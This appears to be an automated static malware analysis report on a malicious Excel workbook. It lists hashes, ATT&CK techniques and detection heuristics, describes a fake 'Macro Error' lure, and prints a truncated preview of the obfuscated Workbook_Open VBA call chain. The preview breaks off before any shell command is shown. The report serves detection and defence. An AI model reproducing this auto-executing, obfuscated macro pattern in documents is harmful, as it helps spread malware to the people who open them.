Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94ff6d708820dda5…

MALICIOUS

Office (OLE)

Size: 375.5 KB
Created: 2017-07-21 03:23:38
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: e9192442235929694c7b20a4b479cb3b
SHA-1: 870dd5011c08db8a1bc4f67c0ffd7d01a277e229
SHA-256: 94ff6d708820dda59738401ea10eb1b0d7d98d104a998ba6cee70e728eb5f29f
Risk Score: 228

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is an Excel document containing a Workbook_Open VBA macro that executes a shell command. The document body displays a fake 'Macro Error' message to lure the user into enabling macros. The VBA code is heavily obfuscated, but the presence of Shell() calls and the Workbook_Open auto-execution indicate a malicious intent to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Xls.Malware.Valyria-10036513-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 88596 bytes
SHA-256: e361d773fbc4e9e44732e39975ed956ab4061ea77321547ca2fe6c655a3e2c71

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOOK_oPen(): Call hCMvpTIkAOFLi: End Sub
Function hCMvpTIkAOFLi() As Integer
Call FOlBtvPFVMoZv
End Function
Function FOlBtvPFVMoZv()
Call aTDggaXNalZUl
End Function
Sub aTDggaXNalZUl()
Call kJTWGQHxQmEfE
End Sub
Function kJTWGQHxQmEfE()
Call IVrcKrNSkknuR
End Function
Static Sub IVrcKrNSkknuR()
Call TFzquHUVycZSh
End Sub
Private Sub TFzquHUVycZSh()
Call bMvFrzuhybhgj
End Sub
Private Function bMvFrzuhybhgj() As Long
Call VxjDJGyHTdkrq
End Function
Private Function VxjDJGyHTdkrq() As Boolean
Call BUudHzXGJGbhe
End Function
Private Sub BUudHzXGJGbhe()
Call sVOBwISIpGHuU
End Sub
Function sVOBwISIpGHuU() As Long
Call jWiZlRMKUGoHK
End Function
Sub jWiZlRMKUGoHK()
Call OTYFuMxkSWAAI
End Sub
Private Function OTYFuMxkSWAAI() As Boolean
Call oPQmbmMccWGNm
End Function
Static Sub oPQmbmMccWGNm()
Call PLISJLbVnXLZR
End Sub
Private Sub PLISJLbVnXLZR()
Call kchpfRxJtbkIY
End Sub
Static Function kchpfRxJtbkIY() As Double
Call IoGvjsDfNZTWk
End Function
Static Sub IoGvjsDfNZTWk()
Call SeVlJimODayiD
End Sub
Private Sub SeVlJimODayiD()
Call ziSribVAQPIwY
End Sub
Sub ziSribVAQPIwY()
Call HpOGeTwMQOQJZ
End Sub
Function HpOGeTwMQOQJZ() As Single
Call BaCFxazmlQTVh
End Function
Function BaCFxazmlQTVh() As String
Call GBVyOuJsRsEyq
End Function
Static Function GBVyOuJsRsEyq() As Byte
Call yCpWDCEuwslLf
End Function
Static Sub yCpWDCEuwslLf()
Call pDJusLzxbsSYV
End Sub
Sub pDJusLzxbsSYV()
Call vobUwfdBFJuDH
End Sub
Sub vobUwfdBFJuDH()
Call WkTAeEsuPKAPl
End Sub
Function WkTAeEsuPKAPl() As String
Call KBUxpQeYEHKeJ
End Function
Sub KBUxpQeYEHKeJ()
Call XLxGPdZBLMbzP
End Sub
Static Function XLxGPdZBLMbzP() As Variant
Call pCBjwlGPYDVlh
End Function
Private Sub pCBjwlGPYDVlh()
Call RrZoBHkCoWVVc
End Sub
Sub RrZoBHkCoWVVc()
Call ZxWDyzLOoVdid
End Sub
Sub ZxWDyzLOoVdid()
Call TjJCQFOoJXgul
End Sub
Function TjJCQFOoJXgul() As Double
Call apFQMypAJWoIm
End Function
Function apFQMypAJWoIm() As Single
Call iwCfJqQMJVwVn
End Function
Function iwCfJqQMJVwVn() As String
Call bipebwTmeXzhv
End Function
Sub bipebwTmeXzhv()
Call joltXpuyeWHuw
End Sub
Sub joltXpuyeWHuw()
Call rvhIUhVJeVPIx
End Sub
Sub rvhIUhVJeVPIx()
Call kgVGmoYjzYSTF
End Sub
Function kgVGmoYjzYSTF() As Date
Call snRVjgzvzXahG
End Function
Function snRVjgzvzXahG() As Variant
Call ztNkfYaHzVjvI
End Function
Function ztNkfYaHzVjvI() As Currency
Call tfBixfdhUYmGP
End Function
Private Sub tfBixfdhUYmGP()
Call BmxxuXEtUXuUR
End Sub
Static Sub BmxxuXEtUXuUR()
Call IstMqPfFUWCiS
End Sub
Static Function IstMqPfFUWCiS() As Currency
Call CehLJWifpYFtZ
End Function
Function CehLJWifpYFtZ() As Object
Call KkdZFOJrpXNHb
End Function
Function KkdZFOJrpXNHb() As String
Call RDgglhxipAJJt
End Function
Function RDgglhxipAJJt() As Byte
Call IEAEaqskUAqWj
End Function
Sub IEAEaqskUAqWj()
Call zFUcOznnAAXkY
End Sub
Function zFUcOznnAAXkY() As String
Call qHozDIipfADxO
End Function
Static Sub qHozDIipfADxO()
Call hIIXsRdsKAkKE
End Sub
Static Function hIIXsRdsKAkKE() As Object
Call YJcvhZYupzRXu
End Function
Sub YJcvhZYupzRXu()
Call QLxTWiTwUzykk
End Sub
Function QLxTWiTwUzykk() As Single
Call HMRqLrOzzzfxa
End Function
Sub HMRqLrOzzzfxa()
Call yNlOAAJBfzLKP
End Sub
Static Function yNlOAAJBfzLKP() As Currency
Call pPFmoJEDKysYF
End Function
Static Sub pPFmoJEDKysYF()
Call gQZKdSzGpyZlv
End Sub
Static Function gQZKdSzGpyZlv() A
... (truncated)